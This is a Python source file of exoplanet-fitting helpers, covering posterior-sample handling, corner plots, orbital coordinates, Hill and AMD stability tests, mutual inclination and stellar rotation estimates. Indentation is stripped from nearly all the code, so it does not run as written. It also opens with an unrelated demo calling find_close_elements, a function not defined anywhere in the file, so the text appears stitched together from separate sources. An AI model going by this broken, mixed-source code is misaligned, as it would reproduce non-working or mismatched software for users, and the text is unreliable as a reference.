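# A short usage example with made-up numbers: only 2.0 and 2.005 lie within the
# 0.01 precision of each other, so each is returned from its respective array.
def _find_close_elements_demo():
    matched = find_close_elements([1.00, 2.00, 3.50], [2.005, 5.00], precision=0.01)
    return matched  # [[2.0], [2.005]]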
def custom_param_file_for_stability(max_time,time_step):
##### create the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
    max_time = float(max_time)*365.25 # convert from years to days
param_file.write("""0.0d0 %s %s
%s %s
F T T T T F
0.001 50.0 50.0 -1. T
bin.dat
unknown
"""%(max_time, time_step, max_time/1e4, max_time/1e3 ))
param_file.close()
return
def add_mcmc_samples(obj,sampler):
bestfit_labels = ["median","mean","mode","best_samp","best_gui","none",
"mass","use_Me","use_Mj","use_Ms",
"semimajor","radius","use_Re","use_Rj","use_Rs","use_lambda", "use_ppm"]
bestfit_labels_bool = [obj.mcmc_save_median,obj.mcmc_save_means,obj.mcmc_save_mode,
obj.mcmc_save_maxlnL,False,False,False,
True,False,False,False,False,True,False,False,False,False]
sampler._lbf = {k: np.array([obj.e_for_mcmc[k], True]) for k in range(len(obj.e_for_mcmc))}
for k in range(17):
sampler._lbf[bestfit_labels[k]] = bestfit_labels_bool[k]
cornerplot_opt = {"bins":25,
"color":"k",
"reverse":False,
"upper":True,
"quantiles":68.3,
"levels":(0.6827, 0.9545,0.9973),
"smooth":1.0,
"smooth1d":1.0,
"plot_contours":True,
"show_titles":True,
"dpi":300,
"pad":15,
"labelpad":0,
"truth_color":'r',
"title_kwargs":{"fontsize": 12},
"scale_hist":True,
"fill_contours":False,
"no_fill_contours":True,
"plot_datapoints":True,
"stab_color":"r",
"stab_threshold":100000
}
sampler._lbf["cornerplot"] = cornerplot_opt
sampler._lbf["OrigLabels"] = dill.copy(obj.e_for_mcmc)
obj.mcmc_sampler=sampler
obj.sampler_saved=True
def add_ns_samples(obj,sampler):
bestfit_labels = ["median","mean","mode","best_samp","best_gui","none",
"mass","use_Me","use_Mj","use_Ms",
"semimajor","radius","use_Re","use_Rj","use_Rs","use_lambda","use_ppm"]
bestfit_labels_bool = [obj.ns_save_median,obj.ns_save_means,obj.ns_save_mode,
obj.ns_save_maxlnL,False,False,False,
True,False,False,False,False,True,False,False,False,False]
obj.ns_sampler= dill.copy(sampler.results)
obj.ns_sampler._lbf = {k: np.array([obj.e_for_mcmc[k], True]) for k in range(len(obj.e_for_mcmc))}
for k in range(17):
obj.ns_sampler._lbf[bestfit_labels[k]] = bestfit_labels_bool[k]
cornerplot_opt = {"bins":25,
"color":"k",
"reverse":False,
"upper":True,
"quantiles":68.3,
"levels":(0.6827, 0.9545,0.9973),
"smooth":1.0,
"smooth1d":1.0,
"plot_contours":True,
"show_titles":True,
"dpi":300,
"pad":15,
"labelpad":0,
"truth_color":'r',
"title_kwargs":{"fontsize": 12},
"scale_hist":True,
"fill_contours":False,
"no_fill_contours":True,
"plot_datapoints":True,
"stab_color":"r",
"stab_threshold":100000
}
obj.ns_sampler._lbf["cornerplot"] = cornerplot_opt
obj.ns_sampler._lbf["OrigLabels"] = dill.copy(obj.e_for_mcmc)
#delattr(obj.ns_sampler, 'rstate')
obj.sampler_saved=True
def get_quad_model(x,y,a1,a2,a3):
x = x - x[0]
y = y + a1 + a2*x + a3*x**2
return y
def get_airmass_model(x,y,a1,a2,a3):
#x = x - x[0]
#print(a1,a2,x[0:2],a2*x[0:2])
y = y + a1 + a2*x + a3*x**2
return y
def get_mode_of_samples(samples, nsamp):
mode_samp = []
# err1_samp = []
# err2_samp = []
for i in range(nsamp):
#ci = np.percentile(samples[:,i], [level, 100.0-level])
#mmm = stats.binned_statistic(np.array([samples[:,i]]), axis=None)
n, b = np.histogram(samples[:,i], bins=100)
n = gaussian_filter(n, 1.0)
x0 = np.array(list(zip(b[:-1], b[1:]))).flatten()
y0 = np.array(list(zip(n, n))).flatten()
k = np.unravel_index(y0.argmax(),y0.shape)
mode_samp.append(x0[k])
#err1_samp.append(x0[k]- ci[0])
#err2_samp.append(ci[1]- x0[k])
# print el_str[i],'=', x0[k], "- %s"%(x0[k]-ci[0]), "+ %s"%(ci[1] - x0[k] )
return mode_samp #,err1_samp,err2_samp
def get_mean_of_samples(samples, nsamp):
mean_samp = []
for i in range(nsamp):
mean_samp.append(np.mean(samples[:,i]))
return mean_samp
def get_median_of_samples(samples, nsamp):
median_samp = []
for i in range(nsamp):
median_samp.append(np.median(samples[:,i]))
return median_samp
def get_MAD_of_samples(samples, nsamp):
mad_samp = []
for i in range(nsamp):
mad_samp.append(np.mean(np.absolute(samples[:,i] - np.mean(samples[:,i]))))
return mad_samp
def get_best_lnl_of_samples(samples,lnl, nsamp):
best_ln_samp = []
lnL_best_idx = np.argmax(lnl)
lnL_best = lnl[lnL_best_idx]
for i in range(nsamp):
minlnL = samples[lnL_best_idx,i]
best_ln_samp.append(minlnL)
return best_ln_samp,lnL_best #,err1_samp,err2_samp
def cornerplot(obj, level=(100.0-68.3)/2.0, type_plot = 'mcmc', **kwargs):
#obj = dill.copy(copied_obj)
'''Generate a corner plot visualizing the MCMC or nested-sampling posterior samples attached to the session object.'''
#self.mcmc_sample_file = 'mcmc_samples'+'_%s'%mod
#self.corner_plot_file = 'cornerplot.png'
if type_plot == 'mcmc':
#### load the samples, labels and lnL values
ln = dill.copy(np.hstack(obj.mcmc_sampler.lnL))
samples = dill.copy(np.array(obj.mcmc_sampler.samples))
#labels = dill.copy(obj.e_for_mcmc)
labels = dill.copy(obj.mcmc_sampler._lbf["OrigLabels"])
mod_labels = dill.copy(obj.mcmc_sampler._lbf)
if mod_labels['mean'] ==True:
best_fit_par = obj.mcmc_stat["mean"]
elif mod_labels['median']==True:
best_fit_par = obj.mcmc_stat["median"]
elif mod_labels['mode']==True:
best_fit_par = obj.mcmc_stat["mode"]
elif mod_labels['best_samp']==True:
best_fit_par = obj.mcmc_stat["best"]
elif mod_labels['none']==True:
best_fit_par = obj.par_for_mcmc
elif mod_labels['best_gui']==True:
best_fit_par = obj.par_for_mcmc
else:
best_fit_par = obj.par_for_mcmc
cornerplot_opt = dill.copy(obj.mcmc_sampler._lbf["cornerplot"])
elif type_plot == 'nest':
#### load the samples, labels and lnL values
#ln = dill.copy(obj.ns_sampler.results.logl)
# samples = dill.copy(np.array(obj.ns_sampler.results.samples))
ln = dill.copy(obj.ns_sampler.logl)
samples = dill.copy(np.array(obj.ns_sampler.samples))
#labels = dill.copy(obj.e_for_mcmc)
labels = dill.copy(obj.ns_sampler._lbf["OrigLabels"])
mod_labels = dill.copy(obj.ns_sampler._lbf)
if mod_labels['mean'] ==True:
best_fit_par = obj.nest_stat["mean"]
elif mod_labels['median']==True:
best_fit_par = obj.nest_stat["median"]
elif mod_labels['mode']==True:
best_fit_par = obj.nest_stat["mode"]
elif mod_labels['best_samp']==True:
best_fit_par = obj.nest_stat["best"]
elif mod_labels['none']==True:
best_fit_par = obj.par_for_mcmc
elif mod_labels['best_gui']==True:
best_fit_par = obj.par_for_mcmc
else:
best_fit_par = obj.par_for_mcmc
cornerplot_opt = dill.copy(obj.ns_sampler._lbf["cornerplot"])
else:
return
############### make "Gaussan" samples of the stellar parameters ##############
#m_s = np.random.normal(loc=obj.stellar_mass, scale=obj.stellar_mass_err, size=len(samples[:,0]))
#r_s = np.random.normal(loc=obj.stellar_radius, scale=obj.stellar_radius_err, size=len(samples[:,0]))
# L_s = np.random.normal(loc=obj.stellar_luminosity,scale=obj.stellar_luminosity_err,size=len(samples[:,0]))
# vsini = np.random.normal(loc=obj.stellar_vsini, scale=obj.stellar_vsini_err, size=len(samples[:,0]))
#
######### define new samples, labels and best-fit params to be refilled again
######### with masses, semi-major axes, etc. (to be re-worked).
m_s = []
r_s = []
samp = []
samp_labels = []
samp_best_fit_par = []
#print(best_fit_par)
for i in range(len(labels)):
ss = np.hstack(samples[:,i])
if mod_labels['use_ppm']:
if 'transit' in labels[i]:
ss = ss * 1000000.0
samp.append(ss)
samp_labels.append(labels[i])
samp_best_fit_par.append(best_fit_par[i])
index_to_keep = []
for i in range(len(labels)):
samp_labels[i] = mod_labels[i][0]
if mod_labels[i][1] == 'True':
index_to_keep.append(i)
samp = [samp[i] for i in index_to_keep]
samp_labels = [samp_labels[i] for i in index_to_keep]
samp_best_fit_par = [samp_best_fit_par[i] for i in index_to_keep]
letters = ['b','c','d','e','f','g','h'] #... For the planets
if mod_labels['use_lambda']:
for i in range(obj.npl):
let = letters[i]
if not 'e$_%s$'%let in labels or not '$\omega_%s$'%let in labels:
continue
Ma_ = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'MA$_%s$'%let]])
omega_ = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == '$\omega_%s$'%let]])
lambda_ = np.array(Ma_ + omega_)%360.0
samp.append(lambda_)
samp_labels.append(r' $\lambda_%s$'%let)
if mod_labels['mean']:
samp_best_fit_par.append((np.mean(Ma_) + np.mean(omega_))%360.0 )
elif mod_labels['median']:
samp_best_fit_par.append((np.median(Ma_) + np.median(omega_))%360.0 )
elif mod_labels['best_gui']:
samp_best_fit_par.append((Ma_[np.argmax(ln)] + omega_[np.argmax(ln)])%360.0 )
else:
samp_best_fit_par.append((Ma_[np.argmax(ln)] + omega_[np.argmax(ln)])%360.0 )
if mod_labels['mass']:
m_s = np.random.normal(loc=obj.stellar_mass, scale=obj.stellar_mass_err, size=len(ss))
for i in range(obj.npl):
let = letters[i]
if not 'K$_%s$'%let in labels or not 'P$_%s$'%let in labels:
continue
K = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'K$_%s$'%let]])
P = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'P$_%s$'%let]])
if obj.hkl == True and '$e sin(\omega_%s)$'%let in labels and '$e cos(\omega_%s)$'%let in labels:
esinw = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == '$e sin(\omega_%s)$'%let]])
ecosw = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == '$e cos(\omega_%s)$'%let]])
ecc = np.sqrt(esinw**2 + ecosw**2)
elif obj.hkl == False and 'e$_%s$'%let in labels:
ecc = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'e$_%s$'%let]])
else:
ecc = np.array([0]*len(K))
print("Warning, no eccentricity samples found for planet %s ! Assuming ecc = 0"%str(i+1))
if mod_labels['use_Me']:
M_fact = 317.82838
mass_lab = r'[M$_\oplus$]'
elif mod_labels['use_Mj']:
M_fact = 1
mass_lab = r'[M$_{\rm Jup.}$]'
elif mod_labels['use_Ms']:
M_fact = 1.0/1047.0
mass_lab = r'[M$_\odot$]'
if 'i$_%s$'%let in labels:
incl = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'i$_%s$'%let]])
samp_labels.append(r'm$_%s$ %s'%(let,mass_lab))
else:
incl = np.array([90]*len(K))
samp_labels.append(r'm $\sin i_%s$ %s'%(let,mass_lab))
samp.append(np.array(get_mass(K,P, ecc, incl, m_s) * M_fact))
if mod_labels['mean']:
samp_best_fit_par.append(get_mass(np.mean(K),np.mean(P),np.mean(ecc), np.mean(incl), np.mean(m_s)) * M_fact)
elif mod_labels['median']:
samp_best_fit_par.append(get_mass(np.median(K),np.median(P),np.median(ecc), np.median(incl), np.median(m_s)) *M_fact)
elif mod_labels['best_gui']:
samp_best_fit_par.append(obj.masses[i]*M_fact)
else:
samp_best_fit_par.append(get_mass(K[np.argmax(ln)],P[np.argmax(ln)], ecc[np.argmax(ln)], incl[np.argmax(ln)], obj.stellar_mass)*M_fact)
if mod_labels['semimajor']:
if len(m_s) == 0:
m_s = np.random.normal(loc=obj.stellar_mass, scale=obj.stellar_mass_err, size=len(samples[:,0]))
for i in range(obj.npl):
let = letters[i]
if not 'P$_%s$'%let in labels:
continue
P = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'P$_%s$'%let]])
samp.append(np.array(P_to_a(P,m_s)))
samp_labels.append(r'a$_%s$ [au]'%let)
if mod_labels['mean']:
samp_best_fit_par.append(P_to_a(np.mean(P),np.mean(m_s)))
elif mod_labels['median']:
samp_best_fit_par.append(P_to_a(np.median(P),np.median(m_s)))
elif mod_labels['best_gui']:
samp_best_fit_par.append(obj.semimajor[i])
else:
samp_best_fit_par.append(P_to_a(P[np.argmax(ln)],obj.stellar_mass))
if mod_labels['radius']:
r_s = np.random.normal(loc=obj.stellar_radius, scale=obj.stellar_radius_err, size=len(samples[:,0]))
for i in range(obj.npl):
let = letters[i]
if not 'R/$R_\star$ $%s$'%let in labels:
continue
if mod_labels['use_Re']:
R_fact = 109.076
rad_lab = r'[R$_\oplus$]'
elif mod_labels['use_Rj']:
R_fact = 9.955201593
rad_lab = r'[R$_{\rm Jup.}$]'
elif mod_labels['use_Rs']:
R_fact = 1.0
rad_lab = r'[R$_\odot$]'
rad = np.hstack(samples[:,[ii for ii, j in enumerate(labels) if j == 'R/$R_\star$ $%s$'%let]]) * R_fact
samp.append(np.array(rad*r_s))
samp_labels.append(r'R$_%s$ %s'%(let,rad_lab))
if mod_labels['mean']:
samp_best_fit_par.append(np.mean(rad)*np.mean(r_s))
elif mod_labels['median']:
samp_best_fit_par.append(np.median(rad)*np.median(r_s))
else:
samp_best_fit_par.append(rad[np.argmax(ln)]*obj.stellar_radius)
# if mod_labels['gravity']:
# if len(r_s) == 0:
# r_s = np.random.normal(loc=obj.stellar_radius, scale=obj.stellar_radius_err, size=len(samples[:,0]))
################### Transpose is needed for the cornerplot. ###################
samples_ = np.transpose(samp)
#labels = samp_labels
best_fit_par =samp_best_fit_par
################### Verbose output (TBD). ###################
verbose = True
level = (100.0-68.3)/2.0
if verbose:
print(" ")
print(" ")
if mod_labels['mean']:
print("Means and their 1 sigma errors")
elif mod_labels['median']:
print("Median and their 1 sigma errors")
elif mod_labels['best_gui']:
print("Best-fit (GUI) and their 1 sigma errors")
else:
print("Best-fit (max. samp. lnL) and their 1 sigma errors")
for i in range(len(samp_best_fit_par)):
ci = np.percentile(samp[i], [level, 100.0-level])
if mod_labels['mean']:
print(samp_labels[i],'=', np.mean(samp[i]), "- %s"%(np.mean(samp[i])-ci[0]), "+ %s"%(ci[1] - np.mean(samp[i]) ))
elif mod_labels['median']:
print(samp_labels[i],'=', np.median(samp[i]), "- %s"%(np.median(samp[i])-ci[0]), "+ %s"%(ci[1] - np.median(samp[i]) ))
elif mod_labels['best_gui']:
print(samp_labels[i],'=', samp_best_fit_par[i], "- %s"%(samp_best_fit_par[i]-ci[0]), "+ %s"%(ci[1] - samp_best_fit_par[i] ))
else:
print(samp_labels[i],'=', samp[i][np.argmax(ln)], "- %s"%(samp[i][np.argmax(ln)]-ci[0]), "+ %s"%(ci[1] - samp[i][np.argmax(ln)] ))
print(" ")
print("Median Absolute Deviation values")
mad = get_MAD_of_samples(samples_,len(samp_labels))
for i in range(len(samp_labels)):
print(samp_labels[i],' MAD =', mad[i])
range_stab =[]
# for i in range(len(samp)):
# range_stab.append([0.0,1.0])
if mod_labels['none']==True:
best_fit_par = None
if "max. time" in labels:
samples_stab = []
samples_ = np.transpose(samples_)
for i in range(len(samples_)):
samples_stab.append(samples_[i][np.where(samples[:,-1]> cornerplot_opt["stab_threshold"])])
# print(max(samples[:,-1])-1000.0,max(samples[:,-1]))
range_stab.append([min(samples_[i]),max(samples_[i])])
N_samp = len(np.atleast_1d(samples_stab[0]))
samples_stab = np.transpose(samples_stab)
samples_ = np.transpose(samples_)
if N_samp > len(samp_best_fit_par): # best_fit_par may be None here (when 'none' is selected), so count the parameters instead
fig = corner.corner(samples_stab,
range = range_stab,
bins=cornerplot_opt["bins"],
color=cornerplot_opt["stab_color"],
reverse=cornerplot_opt["reverse"],
upper=cornerplot_opt["upper"],
labels=samp_labels,
quantiles=[level/100.0, 1.0-level/100.0],
levels=(0.6827, 0.9545,0.9973),
smooth=cornerplot_opt["smooth"],
smooth1d=cornerplot_opt["smooth1d"],
plot_contours=cornerplot_opt["plot_contours"],
show_titles=cornerplot_opt["show_titles"],
truths=best_fit_par,
dpi=cornerplot_opt["dpi"],
pad=cornerplot_opt["pad"],
labelpad=cornerplot_opt["labelpad"],
truth_color=cornerplot_opt["truth_color"],
title_kwargs={"fontsize": 12},
scale_hist=cornerplot_opt["scale_hist"],
no_fill_contours=cornerplot_opt["no_fill_contours"],
fill_contours=cornerplot_opt["fill_contours"],
plot_datapoints=cornerplot_opt["plot_datapoints"],
# data_kwargs={'zorder':10,'color':cornerplot_opt["stab_color"]},
contour_kwargs={'color':cornerplot_opt["stab_color"]},
hist_kwargs={'color':cornerplot_opt["stab_color"]},
kwargs={'zorder':10,'color':cornerplot_opt["stab_color"]}
)
else:
print("very few, or no stable samples !!!!!")
fig = corner.corner(samples_,
#range = range_stab,
bins=cornerplot_opt["bins"],
color=cornerplot_opt["color"],
reverse=cornerplot_opt["reverse"],
upper=cornerplot_opt["upper"],
labels=samp_labels,
quantiles=[level/100.0, 1.0-level/100.0],
levels=(0.6827, 0.9545,0.9973),
smooth=cornerplot_opt["smooth"],
smooth1d=cornerplot_opt["smooth1d"],
plot_contours=cornerplot_opt["plot_contours"],
show_titles=cornerplot_opt["show_titles"],
truths=best_fit_par,
dpi=cornerplot_opt["dpi"],
pad=cornerplot_opt["pad"],
labelpad=cornerplot_opt["labelpad"],
truth_color=cornerplot_opt["truth_color"],
title_kwargs={"fontsize": 12},
scale_hist=cornerplot_opt["scale_hist"],
no_fill_contours=cornerplot_opt["no_fill_contours"],
fill_contours=cornerplot_opt["fill_contours"],
plot_datapoints=cornerplot_opt["plot_datapoints"],
kwargs=kwargs)
corner.corner(samples_,
range = range_stab,
bins=cornerplot_opt["bins"],
color=cornerplot_opt["color"],
reverse=cornerplot_opt["reverse"],
upper=cornerplot_opt["upper"],
labels=samp_labels,
quantiles=[level/100.0, 1.0-level/100.0],
levels=(0.6827, 0.9545,0.9973),
smooth=cornerplot_opt["smooth"],
smooth1d=cornerplot_opt["smooth1d"],
plot_contours=cornerplot_opt["plot_contours"],
show_titles=cornerplot_opt["show_titles"],
truths=best_fit_par,
dpi=cornerplot_opt["dpi"],
pad=cornerplot_opt["pad"],
labelpad=cornerplot_opt["labelpad"],
truth_color=cornerplot_opt["truth_color"],
title_kwargs={"fontsize": 12},
scale_hist=cornerplot_opt["scale_hist"],
no_fill_contours=cornerplot_opt["no_fill_contours"],
fill_contours=cornerplot_opt["fill_contours"],
plot_datapoints=cornerplot_opt["plot_datapoints"],
# data_kwargs={'zorder':-1,'color':cornerplot_opt["color"]},
contour_kwargs={'color':cornerplot_opt["color"]},
hist_kwargs={'color':cornerplot_opt["color"]},
kwargs={'zorder':-1,'color':cornerplot_opt["color"]},
fig =fig)
else:
fig = corner.corner(samples_,
#range = range_stab,
bins=cornerplot_opt["bins"],
color=cornerplot_opt["color"],
reverse=cornerplot_opt["reverse"],
upper=cornerplot_opt["upper"],
labels=samp_labels,
quantiles=[level/100.0, 1.0-level/100.0],
levels=(0.6827, 0.9545,0.9973),
smooth=cornerplot_opt["smooth"],
smooth1d=cornerplot_opt["smooth1d"],
plot_contours=cornerplot_opt["plot_contours"],
show_titles=cornerplot_opt["show_titles"],
truths=best_fit_par,
dpi=cornerplot_opt["dpi"],
pad=cornerplot_opt["pad"],
labelpad=cornerplot_opt["labelpad"],
truth_color=cornerplot_opt["truth_color"],
title_kwargs={"fontsize": 12},
scale_hist=cornerplot_opt["scale_hist"],
no_fill_contours=cornerplot_opt["no_fill_contours"],
fill_contours=cornerplot_opt["fill_contours"],
plot_datapoints=cornerplot_opt["plot_datapoints"],
kwargs=kwargs)
if type_plot == 'mcmc':
fig.savefig(obj.mcmc_corner_plot_file)
if type_plot == 'nest':
fig.savefig(obj.nest_corner_plot_file)
### to avoid memory leak in loops!
fig.clf()
del fig
del samples_
del samp
del samples
del ln
print("Cornerplot done!")
return
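# Hedged usage sketch: 'fit' is a hypothetical session object that already carries posterior
# samples (e.g., attached via add_mcmc_samples above); the figure is written to
# fit.mcmc_corner_plot_file (or fit.nest_corner_plot_file when type_plot='nest').
def _example_cornerplot(fit):
    cornerplot(fit, type_plot='mcmc')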
def planet_orbit_xyz(obj, planet):
u1 = obj.params.stellar_mass * (4*np.pi*np.pi)/(365.25*365.25)
mean_orb = np.linspace(0,2.0*np.pi, 360)
x = np.zeros(len(mean_orb))
y = np.zeros(len(mean_orb))
z = np.zeros(len(mean_orb))
u = np.zeros(len(mean_orb))
v = np.zeros(len(mean_orb))
w = np.zeros(len(mean_orb))
dist = np.zeros(len(mean_orb))
q = (1.0 - obj.params.planet_params[2 + int(planet)*7])*float(obj.fit_results.a[int(planet)])
# this needs to be fixed to work with arrays
for f in range(len(mean_orb)):
x[f],y[f],z[f],u[f],v[f],w[f] = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + int(planet)*7],
np.radians(obj.params.planet_params[5 + int(planet)*7]-90.0),
np.radians(obj.params.planet_params[3 + int(planet)*7]) - np.radians(obj.params.planet_params[6 + int(planet)*7]),
np.radians(obj.params.planet_params[6 + int(planet)*7] ), mean_orb[f])
dist[f] = np.sqrt(x[f]**2.0 + y[f]**2.0 + z[f]**2.0)
x_p,y_p,z_p,u_p,v_p,w_p = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + int(planet)*7],
np.radians(obj.params.planet_params[5 + int(planet)*7] -90.0),
np.radians(obj.params.planet_params[3 + int(planet)*7]) - np.radians(obj.params.planet_params[6 + int(planet)*7]),
np.radians(obj.params.planet_params[6 + int(planet)*7]), np.radians(obj.params.planet_params[4 + int(planet)*7]))
min_index = np.unravel_index(np.argmin(dist, axis=None), dist.shape)
max_index = np.unravel_index(np.argmax(dist, axis=None), dist.shape)
return np.array([x,y,z,u,v,w]), np.array([x_p,y_p,z_p,u_p,v_p,w_p]), np.array([x[min_index],y[min_index],z[min_index],u[min_index],v[min_index],w[min_index]]), np.array([x[max_index],y[max_index],z[max_index],u[max_index],v[max_index],w[max_index]])
def get_xyz(obj):
st_mass = obj.params.stellar_mass * (4*np.pi*np.pi)/(365.25*365.25)
frho3 = 1.0
u1 = st_mass
obj.xyz_mass[0] = u1
Msun = 1.989e33
Au = 1.49597892e13
##### this is a hack to avoid a transit-init crash; to be fixed/removed
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) == 0 or np.sum(obj.fit_results.a) == 0:
return obj
#####################################################################
for i in range(obj.npl):
pl_mass_in_st = float(obj.fit_results.mass[i])/ 1047.70266835
pl_mass = pl_mass_in_st * (4*np.pi*np.pi)/(365.25*365.25)
q = (1.0 - obj.params.planet_params[2 + i*7])*float(obj.fit_results.a[i])
obj.rpl[i+1] = frho3*(1.5*pl_mass_in_st*Msun/(2*np.pi))**0.3333333333/Au
# rpl(i) = frho3*(1.5d0*mpl0*MSUN/TWOPI)**0.3333333333d0/AU
obj.rhill[i+1] = float(obj.fit_results.a[i])*(pl_mass/(3.0*st_mass))**0.3333333333
u1 = u1 +pl_mass
obj.xyz_mass[i+1] = pl_mass
x_p,y_p,z_p,u_p,v_p,w_p = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + i*7],
np.radians(obj.params.planet_params[5 + i*7]),
np.radians(obj.params.planet_params[3 + i*7]) - np.radians(obj.params.planet_params[6 + i*7]),
np.radians(obj.params.planet_params[6 + i*7]), np.radians(obj.params.planet_params[4 + i*7]))
obj.xzy[i+1] = np.array([x_p,y_p,z_p])
obj.uvw[i+1] = np.array([u_p,v_p,w_p])
return obj
def get_Hill_satb(obj):
st_mass = float(obj.params.stellar_mass)* 1047.70266835
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) <=1:
return False
#####################################################################
else:
Delta_a = (float(obj.fit_results.a[1]) - float(obj.fit_results.a[0]))/float(obj.fit_results.a[0])
Mu = 2.4*( (float(obj.fit_results.mass[0])/ st_mass) + (float(obj.fit_results.mass[1])/ st_mass) )**(1.0/3.0)
if Mu >= Delta_a:
return False
else:
return True
def get_AMD_stab(obj):
st_mass = float(obj.params.stellar_mass)* 1047.70266835
AMD_stable = True
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) <=1:
return False
else:
pl_ecc = np.array([float(obj.params.planet_params[2 + i*7]) for i in range(obj.npl)])
pl_a = np.array([float(obj.fit_results.a[i]) for i in range(obj.npl)])
pl_mass = np.array([float(obj.fit_results.mass[i]) for i in range(obj.npl)])
inds = pl_a.argsort()
sorted_pl_ecc = pl_ecc[inds]
sorted_pl_a = pl_a[inds]
sorted_pl_mass = pl_mass[inds]
for i in range(obj.npl - 1):
alpha = sorted_pl_a[i]/sorted_pl_a[i+1]
gamma = sorted_pl_mass[i]/sorted_pl_mass[i+1]
epsilon = (sorted_pl_mass[i]+sorted_pl_mass[i+1])/st_mass
AMD = gamma*np.sqrt(alpha)*(1.-np.sqrt(1.-sorted_pl_ecc[i]**2)) + 1.-np.sqrt(1.-sorted_pl_ecc[i+1]**2)
AMD_Hill = gamma*np.sqrt(alpha) + 1. - (1.+gamma)**1.5 * np.sqrt(alpha/(gamma+alpha) * (1.+(3.**(4./3.)*epsilon**(2./3.)*gamma)/((1.+gamma)**2)))
#print( AMD,AMD_Hill)
if AMD >= AMD_Hill:
return False
return AMD_stable
def loglik_AMD_penalty(pl_a,pl_ecc,pl_mass,st_mass):
for i in range(len(pl_a) - 1):
alpha = pl_a[i]/pl_a[i+1]
gamma = pl_mass[i]/pl_mass[i+1]
epsilon = (pl_mass[i]+pl_mass[i+1])/st_mass
AMD = gamma*np.sqrt(alpha)*(1.-np.sqrt(1.- pl_ecc[i]**2)) + 1.-np.sqrt(1.- pl_ecc[i+1]**2)
AMD_Hill = gamma*np.sqrt(alpha) + 1. - (1.+gamma)**1.5 * np.sqrt(alpha/(gamma+alpha) * (1.+(3.**(4./3.)*epsilon**(2./3.)*gamma)/((1.+gamma)**2)))
if AMD >= AMD_Hill:
return -np.inf
return 0
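# Hedged worked example (made-up two-planet system; planet masses in M_Jup and the stellar
# mass converted to the same unit): loglik_AMD_penalty returns 0 when every adjacent pair
# satisfies the AMD-Hill criterion and -inf otherwise, so it can be added to a log-likelihood
# as a hard stability prior.
def _example_amd_penalty():
    pl_a    = np.array([0.7, 1.8])        # semi-major axes [au], inner to outer
    pl_ecc  = np.array([0.05, 0.10])      # eccentricities
    pl_mass = np.array([0.3, 0.9])        # planet masses [M_Jup]
    st_mass = 1.0 * 1047.70266835         # 1 M_Sun expressed in M_Jup
    return loglik_AMD_penalty(pl_a, pl_ecc, pl_mass, st_mass)   # -> 0 (this pair is AMD-stable)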
def randomString(stringLength=5):
"""
Generate a random string of fixed length
"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def copy_file_to_datafiles(path):
'''
Creates a temporary copy of a velocity file (keeping only the first three columns).
input: full path to the file
output: path of the temporary file to be loaded
'''
dirname, basename = os.path.split(path)
#temp_dir = './datafiles'#tempfile.gettempdir()
tmp = '/tmp/es2'
if platform.system() == 'Darwin':
if not os.path.exists(tmp):
os.system("mkdir %s"%tmp)
else:
if os.access(tmp, os.W_OK):
tmp = '/tmp/es2'
else:
tmp = '/tmp/%s'%(randomString(3))
tmp = '%s/%s'%(tmp,randomString(5))
os.system("mkdir %s"%tmp)
else:
tmp = tempfile.mkdtemp()
temp_path = os.path.join(tmp, basename)
# os.system("cp %s %s"%(path, temp_path))
f_in = open(path, "r")
lines = f_in.readlines()
f = open(temp_path, 'wb') # open the file
for j in range(len(lines)):
if lines[j].isspace() or lines[j].split()[0].startswith("#"):
continue
line = lines[j].split()
text = b"%s %s %s \n"%(bytes(str(line[0]).encode()),bytes(str(line[1]).encode()),bytes(str(line[2]).encode()) )
f.write(text)
f.close()
f_in.close()
return temp_path
def mut_incl(i1,i2,capOm):
'''
Calculates the mutual inclination of two planetary orbits.
input parameters:
    i1, i2, capOm: the two inclinations and the difference of the lines of nodes (Delta Omega), in deg.
output parameter:
    Delta i: mutual orbital inclination in deg.
'''
fb = np.degrees(np.arccos(((np.cos(np.radians(i1))*np.cos(np.radians(i2)))+
(np.sin(np.radians(i1))*np.sin(np.radians(i2))*np.cos(np.radians(capOm))))))
return fb
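# Quick sanity check for mut_incl (made-up angles): for two edge-on orbits (i1 = i2 = 90 deg)
# the mutual inclination reduces to the difference of the lines of nodes.
def _example_mut_incl():
    return mut_incl(90.0, 90.0, 30.0)   # -> 30.0 deg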
def add_jitter(obj, errors, ind):
errors_with_jitt = np.array([np.sqrt(errors[i]**2 + obj.params.jitters[ii]**2) for i,ii in enumerate(ind)])
return errors_with_jitt
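# Hedged sketch (made-up numbers): add_jitter only needs obj.params.jitters, so a simple
# namespace object is enough to show the quadrature addition of the per-dataset jitter.
def _example_add_jitter():
    from types import SimpleNamespace
    fake = SimpleNamespace(params=SimpleNamespace(jitters=[2.0, 5.0]))
    errors = np.array([1.0, 1.0])
    ind = [0, 1]   # dataset index of each data point
    return add_jitter(fake, errors, ind)   # -> [sqrt(1+4), sqrt(1+25)] ~ [2.24, 5.10]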
def get_stellar_rotation(obj, print_output=False):
'''
Estimate the stellar rotation period and its uncertainty from v sin i and the stellar radius
(an upper limit on the true period, since sin i <= 1).
'''
vsini = float(obj.stellar_vsini)
vsini_d = float(obj.stellar_vsini_err)
R = float(obj.stellar_radius)
R_d = float(obj.stellar_radius_err)
Rot = (2*np.pi*R*695700.0)/ (vsini * 86400.0)
Delta_Rot = np.sqrt( ( ( (2*np.pi*R*695700.0)**2 * (vsini_d*86400.0)**2) + ((2*np.pi*R_d*695700.0)**2 * (vsini*86400.0)**2) ) /
(vsini*86400.0)**4
)
if print_output == True:
print("Stellar Rot. period = %s +/- %s [days]"%(Rot, Delta_Rot))
return [Rot, Delta_Rot]
